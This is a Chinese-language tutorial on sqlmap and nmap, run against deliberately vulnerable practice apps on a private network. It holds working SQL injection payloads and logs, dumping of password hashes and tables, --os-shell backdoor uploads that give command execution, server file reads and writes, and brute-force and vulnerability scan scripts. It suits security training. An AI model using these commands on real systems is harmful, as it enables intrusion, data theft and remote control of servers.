sqlmap
探测是否存在 sql 注入
┌──(root㉿kali)-[/usr/share/sqlmap/tamper]
└─# sqlmap -u http://192.168.1.6/sqlilabs/Less-3/?id=1
[*] starting @ 10:47:08 /2022-03-21/
[10:47:08] [INFO] testing connection to the target URL
[10:47:09] [INFO] checking if the target is protected by some kind of WAF/IPS
[10:47:10] [INFO] testing if the target URL content is stable
[10:47:11] [INFO] target URL content is stable
[10:47:11] [INFO] testing if GET parameter 'id' is dynamic
[10:47:12] [INFO] GET parameter 'id' appears to be dynamic
[10:47:13] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[10:47:14] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[10:47:14] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] n
[10:47:45] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:47:54] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[10:47:54] [INFO] testing 'Generic inline queries'
[10:47:55] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[10:47:56] [INFO] GET parameter 'id' is 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' injectable
[10:47:56] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:47:56] [WARNING] time-based comparison requires larger statistical model, please wait................ (done)
[10:48:26] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[10:48:26] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[10:48:26] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[10:48:28] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[10:48:32] [INFO] target URL appears to have 3 columns in query
[10:48:39] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 44 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1') AND 4780=4780 AND ('UgbI'='UgbI
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: id=1') AND EXTRACTVALUE(1015,CONCAT(0x5c,0x7162626a71,(SELECT (ELT(1015=1015,1))),0x716a766a71)) AND ('tcsy'='tcsy
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1') AND (SELECT 4859 FROM (SELECT(SLEEP(5)))PGQv) AND ('GEhj'='GEhj
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-4904') UNION ALL SELECT NULL,NULL,CONCAT(0x7162626a71,0x746a64486f5670416b52535261787967426f7246464d7a45474662767257794b615378554a676271,0x716a766a71)-- -
---
[10:48:45] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.18, PHP 5.5.30
back-end DBMS: MySQL >= 5.1
[10:48:51] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.6'
[*] ending @ 10:48:51 /2022-03-21/
需要登录的网站使用 cookie
┌──(root㉿kali)-[/usr/share/sqlmap/tamper]
└─# sqlmap -u "http://192.168.1.6/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit" --cookie="security=low; PHPSESSID=eaokokkmrpvhnmcq6hjsherm23"
[*] starting @ 10:56:45 /2022-03-21/
[10:56:45] [INFO] testing connection to the target URL
[10:56:45] [INFO] testing if the target URL content is stable
[10:56:46] [INFO] target URL content is stable
[10:56:46] [INFO] testing if GET parameter 'id' is dynamic
[10:56:46] [WARNING] GET parameter 'id' does not appear to be dynamic
[10:56:46] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[10:56:46] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[10:56:46] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] n
[10:56:50] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:56:51] [WARNING] reflective value(s) found and filtering out
[10:56:51] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[10:56:51] [INFO] testing 'Generic inline queries'
[10:56:51] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[10:56:51] [INFO] GET parameter 'id' is 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' injectable
[10:56:51] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[10:56:51] [WARNING] time-based comparison requires larger statistical model, please wait........ (done)
[10:57:02] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[10:57:02] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[10:57:02] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[10:57:02] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[10:57:02] [INFO] target URL appears to have 2 columns in query
[10:57:02] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
[10:57:06] [INFO] testing if GET parameter 'Submit' is dynamic
[10:57:07] [WARNING] GET parameter 'Submit' does not appear to be dynamic
[10:57:07] [WARNING] heuristic (basic) test shows that GET parameter 'Submit' might not be injectable
[10:57:07] [INFO] testing for SQL injection on GET parameter 'Submit'
[10:57:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[10:57:07] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[10:57:07] [INFO] testing 'Generic inline queries'
[10:57:07] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[10:57:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
it is recommended to perform only basic UNION tests if there is not at least one other (potential) technique found. Do you want to reduce the number of requests? [Y/n]
[10:57:30] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[10:57:32] [WARNING] GET parameter 'Submit' does not seem to be injectable
sqlmap identified the following injection point(s) with a total of 111 HTTP(s) requests:
---
Parameter: id (GET)
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: id=2' AND EXTRACTVALUE(2227,CONCAT(0x5c,0x7170626a71,(SELECT (ELT(2227=2227,1))),0x7176707071)) AND 'vDuU'='vDuU&Submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=2' AND (SELECT 4482 FROM (SELECT(SLEEP(5)))sdjq) AND 'QYvK'='QYvK&Submit=Submit
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=2' UNION ALL SELECT CONCAT(0x7170626a71,0x654769774a6f55536556704d736246504f714c4f47624a4275617769494741736d4d52516c7a6461,0x7176707071),NULL-- -&Submit=Submit
---
[10:57:32] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.5.30, Apache 2.4.18
back-end DBMS: MySQL >= 5.1
[10:57:32] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.6'
[*] ending @ 10:57:32 /2022-03-21/
使用数据包,使用 - p 参数指定测试参数
┌──(root㉿kali)-[/home/roott/桌面]
└─# sqlmap -r test.txt -p id
[*] starting @ 11:12:20 /2022-03-21/
[11:12:20] [INFO] parsing HTTP request from 'test.txt'
[11:12:20] [INFO] testing connection to the target URL
[11:12:21] [INFO] checking if the target is protected by some kind of WAF/IPS
[11:12:21] [INFO] testing if the target URL content is stable
[11:12:22] [INFO] target URL content is stable
[11:12:22] [INFO] heuristic (basic) test shows that POST parameter 'id' might be injectable (possible DBMS: 'MySQL')
[11:12:22] [INFO] heuristic (XSS) test shows that POST parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[11:12:23] [INFO] testing for SQL injection on POST parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] n
[11:12:26] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:12:27] [WARNING] reflective value(s) found and filtering out
[11:12:28] [INFO] POST parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="hello,vince ")
[11:12:28] [INFO] testing 'Generic inline queries'
[11:12:28] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[11:12:28] [INFO] POST parameter 'id' is 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' injectable
[11:12:28] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[11:12:28] [WARNING] time-based comparison requires larger statistical model, please wait..................... (done)
[11:12:39] [INFO] POST parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[11:12:39] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:12:39] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[11:12:39] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:12:39] [INFO] target URL appears to have 2 columns in query
[11:12:39] [INFO] POST parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 41 HTTP(s) requests:
---
Parameter: id (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 5351=5351&submit=%E6%9F%A5%E8%AF%A2
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: id=1 AND EXTRACTVALUE(3416,CONCAT(0x5c,0x716b7a6a71,(SELECT (ELT(3416=3416,1))),0x716b717a71))&submit=%E6%9F%A5%E8%AF%A2
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 2377 FROM (SELECT(SLEEP(5)))HwAL)&submit=%E6%9F%A5%E8%AF%A2
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=1 UNION ALL SELECT CONCAT(0x716b7a6a71,0x7061674c755a7569526d46415169546e705a4f677a7275644b77525449524a737170636c55445a6d,0x716b717a71),NULL-- -&submit=%E6%9F%A5%E8%AF%A2
---
[11:12:43] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.5.30, Apache 2.4.18
back-end DBMS: MySQL >= 5.1
[11:12:43] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.6'
[*] ending @ 11:12:43 /2022-03-21/
读取文件中的 url 批量测试
┌──(root㉿kali)-[/home/roott/桌面]
└─# sqlmap -m test.txt
使用 post 提交 --data
┌──(root㉿kali)-[/home/roott/桌面]
└─# sqlmap -u "http://192.168.1.6/pikachu/vul/sqli/sqli_id.php" --data="id=1&submit=%E6%9F%A5%E8%AF%A2"
[*] starting @ 11:17:36 /2022-03-21/
[11:17:36] [INFO] resuming back-end DBMS 'mysql'
[11:17:36] [INFO] testing connection to the target URL
you have not declared cookie(s), while server wants to set its own ('PHPSESSID=7k9j5i6n87a...8e6q8h5tj4'). Do you want to use those [Y/n] y
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 5351=5351&submit=%E6%9F%A5%E8%AF%A2
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
Payload: id=1 AND EXTRACTVALUE(3416,CONCAT(0x5c,0x716b7a6a71,(SELECT (ELT(3416=3416,1))),0x716b717a71))&submit=%E6%9F%A5%E8%AF%A2
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 2377 FROM (SELECT(SLEEP(5)))HwAL)&submit=%E6%9F%A5%E8%AF%A2
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: id=1 UNION ALL SELECT CONCAT(0x716b7a6a71,0x7061674c755a7569526d46415169546e705a4f677a7275644b77525449524a737170636c55445a6d,0x716b717a71),NULL-- -&submit=%E6%9F%A5%E8%AF%A2
---
[11:17:38] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.5.30, PHP, Apache 2.4.18
back-end DBMS: MySQL >= 5.1
[11:17:38] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.6'
[*] ending @ 11:17:38 /2022-03-21/
–random-agent, 随机 User-Agent
┌──(root㉿kali)-[/home/roott/桌面]
└─# sqlmap -u http://192.168.1.6/sqlilabs/Less-3/?id=1 --random-agent --proxy http://127.0.0.1:8080
# 没有使用--random-agent,默认的User-Agent: sqlmap/1.6.3#stable (https://sqlmap.org)
GET /sqlilabs/Less-3/?id=1 HTTP/1.1
Cache-Control: no-cache
User-Agent: sqlmap/1.6.3#stable (https://sqlmap.org)
Host: 192.168.1.6
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
# 使用--random-agent,会改变随机User-Agent,
GET /sqlilabs/Less-3/?id=1 HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 5.1; U; de; rv:1.8.1) Gecko/20061208 Firefox/2.0.0 Opera 9.52
Host: 192.168.1.6
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
GET /sqlilabs/Less-3/?id=1 HTTP/1.1
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; de-DE; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
Host: 192.168.1.6
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
–proxy 使用代理连接到 url
http|https|socks4|socks5://address:port,必须采用的格式
--proxy="http://127.0.0.1:8080"
全部使用默认,不用手动输入 y
┌──(root㉿kali)-[/home/roott/桌面]
└─# sqlmap -u http://192.168.1.6/sqlilabs/Less-5/?id=1 --batch
[*] starting @ 11:32:13 /2022-03-21/
[11:32:13] [INFO] testing connection to the target URL
[11:32:15] [INFO] checking if the target is protected by some kind of WAF/IPS
[11:32:16] [INFO] testing if the target URL content is stable
[11:32:17] [INFO] target URL content is stable
[11:32:17] [INFO] testing if GET parameter 'id' is dynamic
[11:32:18] [INFO] GET parameter 'id' appears to be dynamic
[11:32:19] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[11:32:20] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[11:32:20] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[11:32:20] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:32:27] [WARNING] reflective value(s) found and filtering out
[11:32:31] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="are")
[11:32:31] [INFO] testing 'Generic inline queries'
[11:32:32] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[11:32:33] [INFO] GET parameter 'id' is 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)' injectable
[11:32:33] [INFO] testing 'MySQL inline queries'
[11:32:34] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[11:32:34] [WARNING] time-based comparison requires larger statistical model, please wait............. (done)
[11:32:48] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[11:32:49] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[11:32:50] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[11:32:51] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[11:32:52] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[11:32:54] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[11:33:07] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[11:33:07] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:33:07] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[11:33:09] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:33:13] [INFO] target URL appears to have 3 columns in query
do you want to (re)try to find proper UNION column types with fuzzy test? [y/N] N
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[11:33:37] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql')
[11:33:58] [INFO] target URL appears to be UNION injectable with 3 columns
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] Y
[11:34:22] [INFO] testing 'MySQL UNION query (27) - 1 to 20 columns'
[11:34:55] [INFO] testing 'MySQL UNION query (27) - 21 to 40 columns'
[11:35:16] [INFO] testing 'MySQL UNION query (27) - 41 to 60 columns'
[11:35:36] [INFO] testing 'MySQL UNION query (27) - 61 to 80 columns'
[11:35:56] [INFO] testing 'MySQL UNION query (27) - 81 to 100 columns'
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 223 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 5582=5582 AND 'vVqd'='vVqd
Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
Payload: id=1' AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71716b7171,(SELECT (ELT(8464=8464,1))),0x717a767671,0x78))s), 8446744073709551610, 8446744073709551610))) AND 'UuCD'='UuCD
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1' AND (SELECT 2441 FROM (SELECT(SLEEP(5)))yhPs) AND 'jLOw'='jLOw
---
[11:36:18] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.5.30, Apache 2.4.18
back-end DBMS: MySQL >= 5.5
[11:36:25] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.6'
刷新目标的会话文件,避免 sqlmap 自动缓存机制
--flush-session
测试的级别和执行测试的风险
--level# 默认是1,可以选择1-5,级别越高发送的payload越多,越慢
--risk# 风险等级,1-3
设置 sql 注入的技术
–technique,默认情况会使用所有技术进行检测
B:Boolean-based blind(布尔型注入)
E:Error-based(报错型注入)
U:Union query-based(可联合查询注入)
S:Stacked queries(可多语句查询注入)
T:Time-based blind(基于时间延迟注入)
Q:Inline queries(嵌套查询注入)
┌──(root㉿kali)-[/home/roott/桌面]
└─# sqlmap -u http://192.168.1.6/sqlilabs/Less-2/?id=1 --technique E
[*] starting @ 12:03:33 /2022-03-21/
[12:03:33] [INFO] testing connection to the target URL
[12:03:34] [INFO] checking if the target is protected by some kind of WAF/IPS
[12:03:36] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[12:03:37] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[12:03:37] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[12:03:46] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[12:03:51] [INFO] GET parameter 'id' is 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Y
sqlmap identified the following injection point(s) with a total of 6 HTTP(s) requests:
---
Parameter: id (GET)
Type: error-based
Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)
Payload: id=1 AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x7178717171,(SELECT (ELT(7208=7208,1))),0x717a767071,0x78))s), 8446744073709551610, 8446744073709551610)))
、、
# 只显示报错注入的信息
枚举数据库信息
┌──(root㉿kali)-[/home/roott/桌面]
└─# sqlmap -u http://192.168.1.6/sqlilabs/Less-6/?id=1 -a # 所有内容,巨慢
┌──(root㉿kali)-[/home/roott/桌面]
└─# sqlmap -u http://192.168.1.6/sqlilabs/Less-6/?id=1 -b # 获取DBMS标志
┌──(root㉿kali)-[/home/roott/桌面]
└─# sqlmap -u http://192.168.1.6/sqlilabs/Less-6/?id=1 --current-user
#当前用户
┌──(root㉿kali)-[/home/roott/桌面]
└─# sqlmap -u http://192.168.1.6/sqlilabs/Less-6/?id=1 --current-db #当前数据库
┌──(root㉿kali)-[/home/roott/桌面]
└─# sqlmap -u http://192.168.1.6/sqlilabs/Less-6/?id=1 --users # 所有用户
database management system users [4]:
[*] 'niubi'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'
┌──(root㉿kali)-[/home/roott/桌面/vulstudy]
└─# sqlmap -u http://127.0.0.1:83/Less-1/?id=1 --passwords #尝试破解哈希密码原文
┌──(root㉿kali)-[/home/roott/桌面/vulstudy]
└─# sqlmap -u "http://192.168.1.6/sqlilabs/less-2/?id=3" --hostname #获取主机名
[16:32:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.5.30, Apache 2.4.18
back-end DBMS: MySQL >= 5.5
[16:32:17] [INFO] fetching server hostname
hostname: 'DESKTOP-HE8ONJN'
[16:32:18] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.1.6'
┌──(root㉿kali)-[/home/roott/桌面/vulstudy]
└─# sqlmap -u http://127.0.0.1:83/Less-1/?id=1 --is-dba #是不是管理员用户
[16:33:36] [INFO] fetching current user
current user is DBA: True
┌──(root㉿kali)-[/home/roott/桌面/vulstudy]
└─# sqlmap -u http://127.0.0.1:83/Less-1/?id=1 --privileges # 用户的权限
┌──(root㉿kali)-[/home/roott/桌面/vulstudy]
└─# sqlmap -u http://127.0.0.1:83/Less-1/?id=1 --roles # 用户的角色
role功能可以当作权限的集合,给多个用户授予同一个role
获取信息
sqlmap -u http://127.0.0.1:83/Less-1/?id=1 -dbs #所有数据库
sqlmap -u http://127.0.0.1:83/Less-1/?id=1 -D security -tables #security数据库中的表
sqlmap -u http://127.0.0.1:83/Less-1/?id=1 -D security -T users --column # 表中的列
sqlmap -u http://127.0.0.1:83/Less-1/?id=1 -D security -T users -C password --dump #password列中具体信息
使用操作系统命令
┌──(root㉿kali)-[/home/roott/桌面/vulstudy]
└─# sqlmap -u "http://192.168.1.6/sqlilabs/less-2/?id=3" --os-shell
which web application language does the web server support?
[1] ASP (default) #web服务器支持的语言
[2] ASPX
[3] JSP
[4] PHP
> 4
do you want sqlmap to further try to provoke the full path disclosure? [Y/n]
[16:53:39] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default)#默认
[2] custom location(s)# 自定义
[3] custom directory list file #自定义目录列表
[4] brute force search #暴力搜索
> 2
please provide a comma separate list of absolute directory paths: F:\phpstudy\WWW# 选择2输入我知道的绝对路径
[16:53:51] [WARNING] unable to automatically parse any web server path
[16:53:51] [INFO] trying to upload the file stager on 'F:/phpstudy/WWW/' via LIMIT 'LINES TERMINATED BY' method
[16:53:52] [INFO] the file stager has been successfully uploaded on 'F:/phpstudy/WWW/' - http://192.168.1.6:80/tmpuuweo.php
[16:53:52] [INFO] the backdoor has been successfully uploaded on 'F:/phpstudy/WWW/' - http://192.168.1.6:80/tmpbkoif.php
[16:53:52] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
os-shell> ipconfig #输入系统命令
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
---
Windows IP 配置
# 输出
┌──(root㉿kali)-[/home/roott/桌面/vulstudy] #后面跟着要执行的命令
└─# sqlmap -u "http://192.168.1.6/sqlilabs/less-2/?id=3" --os-cmd=ipconfig
[16:58:40] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.5.30, Apache 2.4.18
back-end DBMS: MySQL >= 5.5
[16:58:40] [INFO] going to use a web backdoor for command execution
[16:58:40] [INFO] fingerprinting the back-end DBMS operating system
[16:58:40] [INFO] the back-end DBMS operating system is Windows
which web application language does the web server support?
[1] ASP (default)
[2] ASPX
[3] JSP
[4] PHP
> 4
do you want sqlmap to further try to provoke the full path disclosure? [Y/n]
[16:58:43] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 2
please provide a comma separate list of absolute directory paths: F:\phpstudy\WWW
[16:58:47] [WARNING] unable to automatically parse any web server path
[16:58:47] [INFO] trying to upload the file stager on 'F:/phpstudy/WWW/' via LIMIT 'LINES TERMINATED BY' method
[16:58:48] [INFO] the file stager has been successfully uploaded on 'F:/phpstudy/WWW/' - http://192.168.1.6:80/tmpugnhc.php
[16:58:48] [INFO] the backdoor has been successfully uploaded on 'F:/phpstudy/WWW/' - http://192.168.1.6:80/tmpbyuei.php
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
---
Windows IP 配置
线程和保持连接
┌──(root㉿kali)-[/home/roott/桌面/vulstudy]
└─# sqlmap -u http://127.0.0.1:83/Less-2/?id=1 --threads=10 # 默认使用单线程,最大10
┌──(root㉿kali)-[/home/roott/桌面/vulstudy]
└─# sqlmap -u http://127.0.0.1:83/Less-2/?id=1 --keep-alive # 默认连接成功后很快关闭,使用--keep-alive保持连接
文件上传和读取
┌──(root㉿kali)-[/home/roott/桌面/vulstudy]
└─# sqlmap -u "http://192.168.1.6/sqlilabs/less-2/?id=3" --file-read "D:\test.txt" #读取服务器指定文件
/root/.local/share/sqlmap/output/192.168.1.6/files/D__test.txt (same file)
# 文件所在目录
┌──(root㉿kali)-[~/…/sqlmap/output/192.168.1.6/files]
└─# cat D__test.txt
666666666
┌──(root㉿kali)-[/home/roott/桌面]
└─# sqlmap -u "http://192.168.1.6/sqlilabs/less-2/?id=3" --file-write test.txt --file-dest "F:/test.txt" #将本地文件上传到服务器
nmap
tcp syn 扫描原理(-sS)
syn 是 nmap 默认的扫描方式,tcp syn 扫描为了找到开启的端口。
源系统向目标系统发一个 syn 请求,请求中包含一个端口号,如果目标端口开启,目标系统通过 syn/ack 来响应源系统,源系统通过 rst 响应目标系统,来断开连接
端口状态
- open:开放
- closed:关闭
- filtered:端口被防火墙 ids/ips 屏蔽,无法确定其状态
- unfiltered:端口没有被屏蔽,但是是否开放需要进一步确认
- open|fiftered:端口是开放还是屏蔽,不能确认
- closed|filtered:端口是关闭还是被屏蔽,不能确认
直接扫描
nmap 192.168.1.1
判断端口是否开放
nmap -p 8080 192.168.1.1,-p 指定端口
扫描子网 80 端口
nmap -p 80 192.168.1.1/24
nmap -p 80,8080 192.168.1.1-10
从文件导入地址或网段
nmap -iL test.txt
对目标地址进行路由跟踪
nmap --traceroute 192.168.1.6
扫描 c 端在线状况
nmap -sP 192.168.1.2/24
目标地址操作系统的指纹识别
nmap -O 192.168.1.6
开放端口对应的服务的版本信息
nmap -sV 192.168.1.6
探测防火墙状态
nmap -sF -T4 192.168.1.6
使用 FIN 进行测试,T 表示扫描过程中的时序(0-5),值越高扫描速度越快,容易被防火墙屏蔽
脚本使用,脚本 mul
/usr/share/nmap/scripts
鉴权扫描
对目标或目标网段进行弱口令检测
nmap --script=auth 192.168.1.6
暴力破解攻击
可对数据库,SMB(),SNMP 等进行猜解开
nmap --script=brute 192.168.1.6
扫描常见漏洞
nmap --script=vuln 192.168.1.11
应用服务扫描
nmap --script=realvnc-auth-bypass 192.168.1.6
